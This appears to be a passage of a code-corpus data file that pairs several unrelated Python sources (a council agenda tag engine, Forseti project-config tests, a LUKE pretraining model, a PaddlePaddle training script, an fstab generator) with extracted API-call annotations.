'io.open', 'open', (['AOU_GENERAL_CONCEPT_CSV_PATH', '"""r"""'], {}), "(AOU_GENERAL_CONCEPT_CSV_PATH, 'r')\n", (3978, 4013), False, 'from io import open\n'), ((4762, 4780), 'io.open', 'open', (['in_path', '"""r"""'], {}), "(in_path, 'r')\n", (4766, 4780), False, 'from io import open\n'), ((4320, 4333), 'csv.Sniffer', 'csv.Sniffer', ([], {}), '()\n', (4331, 4333), False, 'import csv\n'), ((3833, 3872), 'common.ERROR_APPENDING.format', 'ERROR_APPENDING.format', ([], {'in_path': 'in_path'}), '(in_path=in_path)\n', (3855, 3872), False, 'from common import CONCEPT, VOCABULARY, DELIMITER, LINE_TERMINATOR, TRANSFORM_FILES, APPEND_VOCABULARY, APPEND_CONCEPTS, ADD_AOU_GENERAL, ERRORS, AOU_GEN_ID, AOU_GEN_VOCABULARY_CONCEPT_ID, AOU_GEN_VOCABULARY_REFERENCE, ERROR_APPENDING, AOU_GEN_NAME\n'), ((4947, 4986), 'common.ERROR_APPENDING.format', 'ERROR_APPENDING.format', ([], {'in_path': 'in_path'}), '(in_path=in_path)\n', (4969, 4986), False, 'from common import CONCEPT, VOCABULARY, DELIMITER, LINE_TERMINATOR, TRANSFORM_FILES, APPEND_VOCABULARY, APPEND_CONCEPTS, ADD_AOU_GENERAL, ERRORS, AOU_GEN_ID, AOU_GEN_VOCABULARY_CONCEPT_ID, AOU_GEN_VOCABULARY_REFERENCE, ERROR_APPENDING, AOU_GEN_NAME\n')]
|
from abc import ABC
import abc
from CouncilTag.ingest.models import Tag
import random
class TagEngine(ABC):
'''
TagEngine is an interface class. You must create a new
class that takes TagEngine as its base to implement the
"find_tags" and "apply_tags" method to use in the meeting injestion process
'''
@abc.abstractmethod
def find_tags(self, agenda_item):
'''
This method expects one parameter, an AgendaItem model.
It should return a list of appropriate tags
'''
raise NotImplementedError("find_tags needs to be implemented")
@abc.abstractmethod
def apply_tags(self, agenda_item, tags):
'''
This method expects two parameters, an AgendaItem model and
a list of tags to be applied to the AgendaItem model
'''
raise NotImplementedError("apply_tags needs to be implemented")
class RandomTagEngine(TagEngine):
tags = []
def __init__(self):
self.tags = Tag.objects.all()
def find_tags(self, agenda_item):
'''
find_tags takes an Agenda Item and outputs
a list of Tag objects
'''
n1 = 0
n2 = 0
while n1 == n2:
n1 = random.randrange(0, len(self.tags))
n2 = random.randrange(0, len(self.tags))
return [ self.tags[n1], self.tags[n2] ]
def apply_tags(self, agenda_item, tags):
'''
apply_tags takes an Agenda Item and a list of Tag objects. The side
effect of this function will be saving the tag association with the
Agenda Item
'''
for t in tags:
agenda_item.tags.add(t)
agenda_item.save()
|
[
"CouncilTag.ingest.models.Tag.objects.all"
] |
[((990, 1007), 'CouncilTag.ingest.models.Tag.objects.all', 'Tag.objects.all', ([], {}), '()\n', (1005, 1007), False, 'from CouncilTag.ingest.models import Tag\n')]
|
"""Tests for rule_generator.project_config."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from absl.testing import absltest
import yaml
from deploy.rule_generator.project_config import ProjectConfig
TEST_PROJECT_YAML = """
overall:
organization_id: '246801357924'
billing_account: <KEY>
forseti:
project:
project_id: forseti-project
owners_group: <EMAIL>
auditors_group: <EMAIL>
data_readwrite_groups:
- <EMAIL>
data_readonly_groups:
- <EMAIL>
generated_fields:
project_number: 9999,
log_sink_service_account: <EMAIL>
generated_fields:
service_account: <EMAIL>
server_bucket: gs://forseti-project-server/
projects:
- project_id: sample-data
owners_group: <EMAIL>
auditors_group: <EMAIL>
data_readwrite_groups:
- <EMAIL>
data_readonly_groups:
- <EMAIL>
- <EMAIL>
additional_project_permissions:
- roles:
- roles/bigquery.dataViewer
- roles/ml.developer
members:
- group:<EMAIL>
- group:<EMAIL>
- group:<EMAIL>
audit_logs:
logs_gcs_bucket:
location: US
storage_class: MULTI_REGIONAL
ttl_days: 365
logs_bigquery_dataset:
location: US
data_buckets:
- name_suffix: '-raw'
location: US-CENTRAL1
storage_class: REGIONAL
- name_suffix: '-processed'
location: US-CENTRAL1
storage_class: REGIONAL
additional_bucket_permissions:
owners:
- 'serviceAccount:<EMAIL>'
bigquery_datasets:
- name: 'data'
location: US
- name: 'more_data'
location: US
additional_dataset_permissions:
readwrite:
- 'serviceAccount:<EMAIL>'
- name: 'euro_data'
location: EU
stackdriver_alert_email: <EMAIL>
enabled_apis:
- monitoring.googleapis.com
- logging.googleapis.com
generated_fields:
project_number: 123546879123
log_sink_service_account: <EMAIL>
"""
class ProjectConfigTest(absltest.TestCase):
def test_load_valid_config(self):
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project = ProjectConfig(
project=yaml_dict['projects'][0],
audit_logs_project=None,
forseti=yaml_dict['forseti'])
self.assertIsNotNone(project)
self.assertEqual('sample-data', project.project_id)
self.assertEqual(['monitoring.googleapis.com', 'logging.googleapis.com'],
project.enabled_apis)
expected_proj_bindings = {
'roles/owner': ['group:<EMAIL>'],
'roles/editor': [
'serviceAccount:<EMAIL>',
'serviceAccount:<EMAIL>',
('serviceAccount:service-123546879123@'
'containerregistry.iam.gserviceaccount.com'),
],
'roles/iam.securityReviewer': [
'group:sample-data-<EMAIL>',
'serviceAccount:<EMAIL>',
],
'roles/bigquery.dataViewer': [
'group:<EMAIL>',
'group:<EMAIL>',
'group:<EMAIL>',
],
'roles/ml.developer': [
'group:<EMAIL>',
'group:<EMAIL>',
'group:<EMAIL>',
],
}
self.assertDictEqual(expected_proj_bindings, project.get_project_bindings())
expected_log_bindings = {
'roles/storage.admin': ['group:<EMAIL>'],
'roles/storage.objectAdmin': [],
'roles/storage.objectViewer': ['group:<EMAIL>'],
'roles/storage.objectCreator': [
'group:<EMAIL>'
],
}
expected_raw_data_bindings = {
'roles/storage.admin': ['group:<EMAIL>',],
'roles/storage.objectAdmin': [
'group:<EMAIL>',
],
'roles/storage.objectCreator': [],
'roles/storage.objectViewer': [
'group:<EMAIL>',
'group:<EMAIL>',
],
}
expected_processed_data_bindings = copy.deepcopy(expected_raw_data_bindings)
expected_processed_data_bindings['roles/storage.admin'].append(
'serviceAccount:<EMAIL>')
expected_bucket_bindings = [
(['sample-data-logs'], expected_log_bindings),
(['sample-data-processed'], expected_processed_data_bindings),
(['sample-data-raw'], expected_raw_data_bindings),
]
self.assertEqual(expected_bucket_bindings, project.get_bucket_bindings())
self.assertEqual(
'bigquery.googleapis.com/projects/sample-data/datasets/audit_logs',
project.get_audit_log_sink_destination())
def test_get_project_bigquery_bindings(self):
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project = ProjectConfig(
project=yaml_dict['projects'][0],
audit_logs_project=None,
forseti=yaml_dict['forseti'])
got_bindings = project.get_project_bigquery_bindings()
default_bindings = [
{
'role': 'OWNER',
'members': [{'group_email': '<EMAIL>'}],
},
{
'role': 'WRITER',
'members': [{'group_email': '<EMAIL>'}],
},
{
'role': 'READER',
'members': [
{'group_email': '<EMAIL>'},
{'group_email': '<EMAIL>'},
],
},
]
# Dataset more_data has an additional writer account.
custom_bindings = copy.deepcopy(default_bindings)
custom_bindings[1]['members'].append(
{'user_email': '<EMAIL>'})
want_bindings = [
(['sample-data:data', 'sample-data:euro_data'], default_bindings),
(['sample-data:more_data'], custom_bindings)
]
self.assertEqual(got_bindings, want_bindings)
def test_get_audit_logs_bigquery_bindings_local(self):
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project = ProjectConfig(
project=yaml_dict['projects'][0],
audit_logs_project=None,
forseti=yaml_dict['forseti'])
got_bindings = project.get_audit_logs_bigquery_bindings()
want_bindings = [
{
'role': 'OWNER',
'members': [{'group_email': '<EMAIL>'}],
},
{
'role': 'WRITER',
'members': [{
'user_email':
'<EMAIL>'
}],
},
{
'role': 'READER',
'members': [{'group_email': '<EMAIL>'}],
},
]
self.assertEqual(got_bindings, want_bindings)
def test_get_audit_logs_bigquery_bindings_remote(self):
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project_dict = yaml_dict['projects'][0]
# Set remote audit logs instead of local audit logs.
project_dict['audit_logs'] = {
'logs_bigquery_dataset': {
'name': 'some_data_logs'
},
}
audit_logs_project = {
'project_id': 'audit-logs',
'owners_group': '<EMAIL>',
}
forseti = yaml_dict['forseti']
project = ProjectConfig(
project=project_dict,
audit_logs_project=audit_logs_project,
forseti=forseti)
got_bindings = project.get_audit_logs_bigquery_bindings()
want_bindings = [
{
'role': 'OWNER',
'members': [{'group_email': '<EMAIL>'}],
},
{
'role': 'WRITER',
'members': [{
'user_email':
'<EMAIL>'
}],
},
{
'role': 'READER',
'members': [{'group_email': '<EMAIL>'}],
},
]
self.assertEqual(got_bindings, want_bindings)
def test_get_audit_log_sink_destination(self):
# Local audit logs.
yaml_dict = yaml.load(TEST_PROJECT_YAML)
project_dict = yaml_dict['projects'][0]
forseti = yaml_dict['forseti']
project = ProjectConfig(
project=project_dict, audit_logs_project=None, forseti=forseti)
self.assertEqual(
'bigquery.googleapis.com/projects/sample-data/datasets/audit_logs',
project.get_audit_log_sink_destination())
# Remote audit logs.
project_dict['audit_logs'] = {
'logs_bigquery_dataset': {
'name': 'some_data_logs'
},
}
audit_logs_project = {
'project_id': 'audit-logs',
'owners_group': '<EMAIL>',
}
project = ProjectConfig(
project=project_dict,
audit_logs_project=audit_logs_project,
forseti=forseti)
self.assertEqual(
'bigquery.googleapis.com/projects/audit-logs/datasets/some_data_logs',
project.get_audit_log_sink_destination())
if __name__ == '__main__':
absltest.main()
|
[
"deploy.rule_generator.project_config.ProjectConfig",
"absl.testing.absltest.main",
"yaml.load",
"copy.deepcopy"
] |
[((8398, 8413), 'absl.testing.absltest.main', 'absltest.main', ([], {}), '()\n', (8411, 8413), False, 'from absl.testing import absltest\n'), ((2040, 2068), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (2049, 2068), False, 'import yaml\n'), ((2083, 2189), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': "yaml_dict['projects'][0]", 'audit_logs_project': 'None', 'forseti': "yaml_dict['forseti']"}), "(project=yaml_dict['projects'][0], audit_logs_project=None,\n forseti=yaml_dict['forseti'])\n", (2096, 2189), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((3832, 3873), 'copy.deepcopy', 'copy.deepcopy', (['expected_raw_data_bindings'], {}), '(expected_raw_data_bindings)\n', (3845, 3873), False, 'import copy\n'), ((4492, 4520), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (4501, 4520), False, 'import yaml\n'), ((4535, 4641), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': "yaml_dict['projects'][0]", 'audit_logs_project': 'None', 'forseti': "yaml_dict['forseti']"}), "(project=yaml_dict['projects'][0], audit_logs_project=None,\n forseti=yaml_dict['forseti'])\n", (4548, 4641), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((5220, 5251), 'copy.deepcopy', 'copy.deepcopy', (['default_bindings'], {}), '(default_bindings)\n', (5233, 5251), False, 'import copy\n'), ((5610, 5638), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (5619, 5638), False, 'import yaml\n'), ((5653, 5759), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': "yaml_dict['projects'][0]", 'audit_logs_project': 'None', 'forseti': "yaml_dict['forseti']"}), "(project=yaml_dict['projects'][0], audit_logs_project=None,\n forseti=yaml_dict['forseti'])\n", (5666, 5759), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((6358, 6386), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (6367, 6386), False, 'import yaml\n'), ((6765, 6860), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': 'project_dict', 'audit_logs_project': 'audit_logs_project', 'forseti': 'forseti'}), '(project=project_dict, audit_logs_project=audit_logs_project,\n forseti=forseti)\n', (6778, 6860), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((7474, 7502), 'yaml.load', 'yaml.load', (['TEST_PROJECT_YAML'], {}), '(TEST_PROJECT_YAML)\n', (7483, 7502), False, 'import yaml\n'), ((7596, 7673), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': 'project_dict', 'audit_logs_project': 'None', 'forseti': 'forseti'}), '(project=project_dict, audit_logs_project=None, forseti=forseti)\n', (7609, 7673), False, 'from deploy.rule_generator.project_config import ProjectConfig\n'), ((8099, 8194), 'deploy.rule_generator.project_config.ProjectConfig', 'ProjectConfig', ([], {'project': 'project_dict', 'audit_logs_project': 'audit_logs_project', 'forseti': 'forseti'}), '(project=project_dict, audit_logs_project=audit_logs_project,\n forseti=forseti)\n', (8112, 8194), False, 'from deploy.rule_generator.project_config import ProjectConfig\n')]
|
# Copyright (c) 2019 <NAME>
#
# Distributed under the Boost Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
import numpy as np
from phylanx import Phylanx
@Phylanx
def in_top_k(predictions, targets, k):
top_k = np.argsort(-predictions)[:, :k]
target = reshape(targets, [-1, 1]) # noqa
return np.any(target == top_k, -1)
|
[
"numpy.any",
"numpy.argsort"
] |
[((384, 411), 'numpy.any', 'np.any', (['(target == top_k)', '(-1)'], {}), '(target == top_k, -1)\n', (390, 411), True, 'import numpy as np\n'), ((294, 318), 'numpy.argsort', 'np.argsort', (['(-predictions)'], {}), '(-predictions)\n', (304, 318), True, 'import numpy as np\n')]
|
import os
import yaml # external libary
def fstab(val="fstab.yaml"):
with open(val, "r") as yamlfile: #read yaml file
data = yaml.safe_load(yamlfile)
output: str=""
for sub in data['fstab']:
if (data['fstab'][sub]["type"]) == "nfs":
output += (str(sub)+":" +data['fstab'][sub]["export"] + " ") # add fstab colums to string
output += ((data['fstab'][sub]["mount"]) + " ")
output += (data['fstab'][sub]["type"] + " ")
else:
output+=(str(sub) +" ") #add fstab sections to string
output+=((data['fstab'][sub]["mount"])+" ")
output+=(data['fstab'][sub]["type"]+" ")
try: #add optional values to string
for opt in data['fstab'][sub]["options"]:
output+=(opt+ ",")
except:pass
output+=("\n") #add new line to string
return output
if __name__ == '__main__':
yamls = input("Enter path to yaml file: ") # get path to yaml file
if yamls == '': yamls ="fstab.yaml" # assume filename when input is ommited
out = fstab(yamls)
with open("fstab", "a") as text_file: # write fstab to file
text_file.write(out)
print("Checking fstab...")
try:
os.system("findmnt --verify --verbose ./fstab") # only works on unix
except:print("Can not check fstab, please run \"findmnt --verify --verbose ./fstab\" on unix.")
|
[
"yaml.safe_load",
"os.system"
] |
[((180, 204), 'yaml.safe_load', 'yaml.safe_load', (['yamlfile'], {}), '(yamlfile)\n', (194, 204), False, 'import yaml\n'), ((1558, 1605), 'os.system', 'os.system', (['"""findmnt --verify --verbose ./fstab"""'], {}), "('findmnt --verify --verbose ./fstab')\n", (1567, 1605), False, 'import os\n')]
|
from typing import Optional
import torch
from torch import nn
from torch.nn import CrossEntropyLoss
from transformers.models.bert.modeling_bert import ACT2FN, BertPreTrainingHeads
from transformers.models.roberta.modeling_roberta import RobertaLMHead
from luke.model import LukeModel, LukeConfig
class EntityPredictionHeadTransform(nn.Module):
def __init__(self, config: LukeConfig):
super(EntityPredictionHeadTransform, self).__init__()
self.dense = nn.Linear(config.hidden_size, config.entity_emb_size)
if isinstance(config.hidden_act, str):
self.transform_act_fn = ACT2FN[config.hidden_act]
else:
self.transform_act_fn = config.hidden_act
self.LayerNorm = nn.LayerNorm(config.entity_emb_size, eps=config.layer_norm_eps)
def forward(self, hidden_states: torch.Tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.transform_act_fn(hidden_states)
hidden_states = self.LayerNorm(hidden_states)
return hidden_states
class EntityPredictionHead(nn.Module):
def __init__(self, config: LukeConfig):
super(EntityPredictionHead, self).__init__()
self.config = config
self.transform = EntityPredictionHeadTransform(config)
self.decoder = nn.Linear(config.entity_emb_size, config.entity_vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.entity_vocab_size))
def forward(self, hidden_states: torch.Tensor):
hidden_states = self.transform(hidden_states)
hidden_states = self.decoder(hidden_states) + self.bias
return hidden_states
class LukePretrainingModel(LukeModel):
def __init__(self, config: LukeConfig):
super(LukePretrainingModel, self).__init__(config)
if self.config.bert_model_name and "roberta" in self.config.bert_model_name:
self.lm_head = RobertaLMHead(config)
self.lm_head.decoder.weight = self.embeddings.word_embeddings.weight
else:
self.cls = BertPreTrainingHeads(config)
self.cls.predictions.decoder.weight = self.embeddings.word_embeddings.weight
self.entity_predictions = EntityPredictionHead(config)
self.entity_predictions.decoder.weight = self.entity_embeddings.entity_embeddings.weight
self.apply(self.init_weights)
def forward(
self,
word_ids: torch.LongTensor,
word_segment_ids: torch.LongTensor,
word_attention_mask: torch.LongTensor,
entity_ids: torch.LongTensor,
entity_position_ids: torch.LongTensor,
entity_segment_ids: torch.LongTensor,
entity_attention_mask: torch.LongTensor,
masked_entity_labels: Optional[torch.LongTensor] = None,
masked_lm_labels: Optional[torch.LongTensor] = None,
**kwargs
):
model_dtype = next(self.parameters()).dtype # for fp16 compatibility
output = super(LukePretrainingModel, self).forward(
word_ids,
word_segment_ids,
word_attention_mask,
entity_ids,
entity_position_ids,
entity_segment_ids,
entity_attention_mask,
)
word_sequence_output, entity_sequence_output = output[:2]
loss_fn = CrossEntropyLoss(ignore_index=-1)
ret = dict(loss=word_ids.new_tensor(0.0, dtype=model_dtype))
if masked_entity_labels is not None:
entity_mask = masked_entity_labels != -1
if entity_mask.sum() > 0:
target_entity_sequence_output = torch.masked_select(entity_sequence_output, entity_mask.unsqueeze(-1))
target_entity_sequence_output = target_entity_sequence_output.view(-1, self.config.hidden_size)
target_entity_labels = torch.masked_select(masked_entity_labels, entity_mask)
entity_scores = self.entity_predictions(target_entity_sequence_output)
entity_scores = entity_scores.view(-1, self.config.entity_vocab_size)
ret["masked_entity_loss"] = loss_fn(entity_scores, target_entity_labels)
ret["masked_entity_correct"] = (torch.argmax(entity_scores, 1).data == target_entity_labels.data).sum()
ret["masked_entity_total"] = target_entity_labels.ne(-1).sum()
ret["loss"] += ret["masked_entity_loss"]
else:
ret["masked_entity_loss"] = word_ids.new_tensor(0.0, dtype=model_dtype)
ret["masked_entity_correct"] = word_ids.new_tensor(0, dtype=torch.long)
ret["masked_entity_total"] = word_ids.new_tensor(0, dtype=torch.long)
if masked_lm_labels is not None:
masked_lm_mask = masked_lm_labels != -1
if masked_lm_mask.sum() > 0:
masked_word_sequence_output = torch.masked_select(word_sequence_output, masked_lm_mask.unsqueeze(-1))
masked_word_sequence_output = masked_word_sequence_output.view(-1, self.config.hidden_size)
if self.config.bert_model_name and "roberta" in self.config.bert_model_name:
masked_lm_scores = self.lm_head(masked_word_sequence_output)
else:
masked_lm_scores = self.cls.predictions(masked_word_sequence_output)
masked_lm_scores = masked_lm_scores.view(-1, self.config.vocab_size)
masked_lm_labels = torch.masked_select(masked_lm_labels, masked_lm_mask)
ret["masked_lm_loss"] = loss_fn(masked_lm_scores, masked_lm_labels)
ret["masked_lm_correct"] = (torch.argmax(masked_lm_scores, 1).data == masked_lm_labels.data).sum()
ret["masked_lm_total"] = masked_lm_labels.ne(-1).sum()
ret["loss"] += ret["masked_lm_loss"]
else:
ret["masked_lm_loss"] = word_ids.new_tensor(0.0, dtype=model_dtype)
ret["masked_lm_correct"] = word_ids.new_tensor(0, dtype=torch.long)
ret["masked_lm_total"] = word_ids.new_tensor(0, dtype=torch.long)
return ret
|
[
"torch.masked_select",
"torch.argmax",
"torch.nn.CrossEntropyLoss",
"torch.nn.LayerNorm",
"transformers.models.roberta.modeling_roberta.RobertaLMHead",
"torch.nn.Linear",
"torch.zeros",
"transformers.models.bert.modeling_bert.BertPreTrainingHeads"
] |
[((474, 527), 'torch.nn.Linear', 'nn.Linear', (['config.hidden_size', 'config.entity_emb_size'], {}), '(config.hidden_size, config.entity_emb_size)\n', (483, 527), False, 'from torch import nn\n'), ((730, 793), 'torch.nn.LayerNorm', 'nn.LayerNorm', (['config.entity_emb_size'], {'eps': 'config.layer_norm_eps'}), '(config.entity_emb_size, eps=config.layer_norm_eps)\n', (742, 793), False, 'from torch import nn\n'), ((1294, 1365), 'torch.nn.Linear', 'nn.Linear', (['config.entity_emb_size', 'config.entity_vocab_size'], {'bias': '(False)'}), '(config.entity_emb_size, config.entity_vocab_size, bias=False)\n', (1303, 1365), False, 'from torch import nn\n'), ((3286, 3319), 'torch.nn.CrossEntropyLoss', 'CrossEntropyLoss', ([], {'ignore_index': '(-1)'}), '(ignore_index=-1)\n', (3302, 3319), False, 'from torch.nn import CrossEntropyLoss\n'), ((1399, 1436), 'torch.zeros', 'torch.zeros', (['config.entity_vocab_size'], {}), '(config.entity_vocab_size)\n', (1410, 1436), False, 'import torch\n'), ((1896, 1917), 'transformers.models.roberta.modeling_roberta.RobertaLMHead', 'RobertaLMHead', (['config'], {}), '(config)\n', (1909, 1917), False, 'from transformers.models.roberta.modeling_roberta import RobertaLMHead\n'), ((2036, 2064), 'transformers.models.bert.modeling_bert.BertPreTrainingHeads', 'BertPreTrainingHeads', (['config'], {}), '(config)\n', (2056, 2064), False, 'from transformers.models.bert.modeling_bert import ACT2FN, BertPreTrainingHeads\n'), ((3796, 3850), 'torch.masked_select', 'torch.masked_select', (['masked_entity_labels', 'entity_mask'], {}), '(masked_entity_labels, entity_mask)\n', (3815, 3850), False, 'import torch\n'), ((5418, 5471), 'torch.masked_select', 'torch.masked_select', (['masked_lm_labels', 'masked_lm_mask'], {}), '(masked_lm_labels, masked_lm_mask)\n', (5437, 5471), False, 'import torch\n'), ((4163, 4193), 'torch.argmax', 'torch.argmax', (['entity_scores', '(1)'], {}), '(entity_scores, 1)\n', (4175, 4193), False, 'import torch\n'), ((5601, 5634), 'torch.argmax', 'torch.argmax', (['masked_lm_scores', '(1)'], {}), '(masked_lm_scores, 1)\n', (5613, 5634), False, 'import torch\n')]
|
import os
import sys
import gzip
import paddle.v2 as paddle
import reader
from utils import logger, parse_train_cmd, build_dict, load_dict
from network_conf import fc_net, convolution_net
def train(topology,
train_data_dir=None,
test_data_dir=None,
word_dict_path=None,
label_dict_path=None,
model_save_dir="models",
batch_size=32,
num_passes=10):
"""
train dnn model
:params train_data_path: path of training data, if this parameter
is not specified, paddle.dataset.imdb will be used to run this example
:type train_data_path: str
:params test_data_path: path of testing data, if this parameter
is not specified, paddle.dataset.imdb will be used to run this example
:type test_data_path: str
:params word_dict_path: path of training data, if this parameter
is not specified, paddle.dataset.imdb will be used to run this example
:type word_dict_path: str
:params num_pass: train pass number
:type num_pass: int
"""
if not os.path.exists(model_save_dir):
os.mkdir(model_save_dir)
use_default_data = (train_data_dir is None)
if use_default_data:
logger.info(("No training data are provided, "
"use paddle.dataset.imdb to train the model."))
logger.info("please wait to build the word dictionary ...")
word_dict = paddle.dataset.imdb.word_dict()
train_reader = paddle.batch(
paddle.reader.shuffle(
lambda: paddle.dataset.imdb.train(word_dict)(), buf_size=1000),
batch_size=100)
test_reader = paddle.batch(
lambda: paddle.dataset.imdb.test(word_dict)(), batch_size=100)
class_num = 2
else:
if word_dict_path is None or not os.path.exists(word_dict_path):
logger.info(("word dictionary is not given, the dictionary "
"is automatically built from the training data."))
# build the word dictionary to map the original string-typed
# words into integer-typed index
build_dict(
data_dir=train_data_dir,
save_path=word_dict_path,
use_col=1,
cutoff_fre=5,
insert_extra_words=["<UNK>"])
if not os.path.exists(label_dict_path):
logger.info(("label dictionary is not given, the dictionary "
"is automatically built from the training data."))
# build the label dictionary to map the original string-typed
# label into integer-typed index
build_dict(
data_dir=train_data_dir, save_path=label_dict_path, use_col=0)
word_dict = load_dict(word_dict_path)
lbl_dict = load_dict(label_dict_path)
class_num = len(lbl_dict)
logger.info("class number is : %d." % (len(lbl_dict)))
train_reader = paddle.batch(
paddle.reader.shuffle(
reader.train_reader(train_data_dir, word_dict, lbl_dict),
buf_size=1000),
batch_size=batch_size)
if test_data_dir is not None:
# here, because training and testing data share a same format,
# we still use the reader.train_reader to read the testing data.
test_reader = paddle.batch(
paddle.reader.shuffle(
reader.train_reader(test_data_dir, word_dict, lbl_dict),
buf_size=1000),
batch_size=batch_size)
else:
test_reader = None
dict_dim = len(word_dict)
logger.info("length of word dictionary is : %d." % (dict_dim))
paddle.init(use_gpu=False, trainer_count=1)
# network config
cost, prob, label = topology(dict_dim, class_num)
# create parameters
parameters = paddle.parameters.create(cost)
# create optimizer
adam_optimizer = paddle.optimizer.Adam(
learning_rate=1e-3,
regularization=paddle.optimizer.L2Regularization(rate=1e-3),
model_average=paddle.optimizer.ModelAverage(average_window=0.5))
# create trainer
trainer = paddle.trainer.SGD(
cost=cost,
extra_layers=paddle.evaluator.auc(input=prob, label=label),
parameters=parameters,
update_equation=adam_optimizer)
# begin training network
feeding = {"word": 0, "label": 1}
def _event_handler(event):
"""
Define end batch and end pass event handler
"""
if isinstance(event, paddle.event.EndIteration):
if event.batch_id % 100 == 0:
logger.info("Pass %d, Batch %d, Cost %f, %s\n" % (
event.pass_id, event.batch_id, event.cost, event.metrics))
if isinstance(event, paddle.event.EndPass):
if test_reader is not None:
result = trainer.test(reader=test_reader, feeding=feeding)
logger.info("Test at Pass %d, %s \n" % (event.pass_id,
result.metrics))
with gzip.open(
os.path.join(model_save_dir, "dnn_params_pass_%05d.tar.gz" %
event.pass_id), "w") as f:
trainer.save_parameter_to_tar(f)
trainer.train(
reader=train_reader,
event_handler=_event_handler,
feeding=feeding,
num_passes=num_passes)
logger.info("Training has finished.")
def main(args):
if args.nn_type == "dnn":
topology = fc_net
elif args.nn_type == "cnn":
topology = convolution_net
train(
topology=topology,
train_data_dir=args.train_data_dir,
test_data_dir=args.test_data_dir,
word_dict_path=args.word_dict,
label_dict_path=args.label_dict,
batch_size=args.batch_size,
num_passes=args.num_passes,
model_save_dir=args.model_save_dir)
if __name__ == "__main__":
args = parse_train_cmd()
if args.train_data_dir is not None:
assert args.word_dict and args.label_dict, (
"the parameter train_data_dir, word_dict_path, and label_dict_path "
"should be set at the same time.")
main(args)
|
[
"reader.train_reader",
"os.mkdir",
"paddle.v2.init",
"paddle.v2.optimizer.L2Regularization",
"utils.logger.info",
"utils.build_dict",
"os.path.join",
"paddle.v2.dataset.imdb.word_dict",
"os.path.exists",
"paddle.v2.dataset.imdb.test",
"paddle.v2.evaluator.auc",
"utils.parse_train_cmd",
"paddle.v2.optimizer.ModelAverage",
"paddle.v2.parameters.create",
"utils.load_dict",
"paddle.v2.dataset.imdb.train"
] |
[((3658, 3718), 'utils.logger.info', 'logger.info', (["('length of word dictionary is : %d.' % dict_dim)"], {}), "('length of word dictionary is : %d.' % dict_dim)\n", (3669, 3718), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((3726, 3769), 'paddle.v2.init', 'paddle.init', ([], {'use_gpu': '(False)', 'trainer_count': '(1)'}), '(use_gpu=False, trainer_count=1)\n', (3737, 3769), True, 'import paddle.v2 as paddle\n'), ((3888, 3918), 'paddle.v2.parameters.create', 'paddle.parameters.create', (['cost'], {}), '(cost)\n', (3912, 3918), True, 'import paddle.v2 as paddle\n'), ((5470, 5507), 'utils.logger.info', 'logger.info', (['"""Training has finished."""'], {}), "('Training has finished.')\n", (5481, 5507), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((6010, 6027), 'utils.parse_train_cmd', 'parse_train_cmd', ([], {}), '()\n', (6025, 6027), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1070, 1100), 'os.path.exists', 'os.path.exists', (['model_save_dir'], {}), '(model_save_dir)\n', (1084, 1100), False, 'import os\n'), ((1110, 1134), 'os.mkdir', 'os.mkdir', (['model_save_dir'], {}), '(model_save_dir)\n', (1118, 1134), False, 'import os\n'), ((1218, 1317), 'utils.logger.info', 'logger.info', (['"""No training data are provided, use paddle.dataset.imdb to train the model."""'], {}), "(\n 'No training data are provided, use paddle.dataset.imdb to train the model.'\n )\n", (1229, 1317), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1342, 1401), 'utils.logger.info', 'logger.info', (['"""please wait to build the word dictionary ..."""'], {}), "('please wait to build the word dictionary ...')\n", (1353, 1401), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1423, 1454), 'paddle.v2.dataset.imdb.word_dict', 'paddle.dataset.imdb.word_dict', ([], {}), '()\n', (1452, 1454), True, 'import paddle.v2 as paddle\n'), ((2772, 2797), 'utils.load_dict', 'load_dict', (['word_dict_path'], {}), '(word_dict_path)\n', (2781, 2797), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((2818, 2844), 'utils.load_dict', 'load_dict', (['label_dict_path'], {}), '(label_dict_path)\n', (2827, 2844), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((1864, 1980), 'utils.logger.info', 'logger.info', (['"""word dictionary is not given, the dictionary is automatically built from the training data."""'], {}), "(\n 'word dictionary is not given, the dictionary is automatically built from the training data.'\n )\n", (1875, 1980), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((2132, 2252), 'utils.build_dict', 'build_dict', ([], {'data_dir': 'train_data_dir', 'save_path': 'word_dict_path', 'use_col': '(1)', 'cutoff_fre': '(5)', 'insert_extra_words': "['<UNK>']"}), "(data_dir=train_data_dir, save_path=word_dict_path, use_col=1,\n cutoff_fre=5, insert_extra_words=['<UNK>'])\n", (2142, 2252), False, 'from utils import logger, parse_train_cmd, build_dict, load_dict\n'), ((2346, 2377), 